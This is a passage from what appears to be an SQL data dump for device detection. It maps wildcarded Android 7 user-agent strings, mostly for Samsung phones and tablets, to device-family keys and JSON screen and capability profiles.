like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J700T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J700T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J710FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J710MN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J727P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J727T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J727T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J727U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N9208) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N920W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-N950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-P550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-P555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_p','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-S337TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-S737TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_s','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T350) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T355) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T355Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T555) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T560NU) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T580) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T585) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T710) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T713) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T715) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T719) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T719Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T810) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T813) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T815) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T819) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-T819Y) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_sm_t','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G890A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G891A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G920AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G928A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J320A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J320AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J326AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J327A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J327AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J727A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-J727AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG-SM-N920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SC-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SC-04G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SC-04J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SC-05G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SCV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SDQ_52004L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SENSEIT A250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SENSEIT R500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 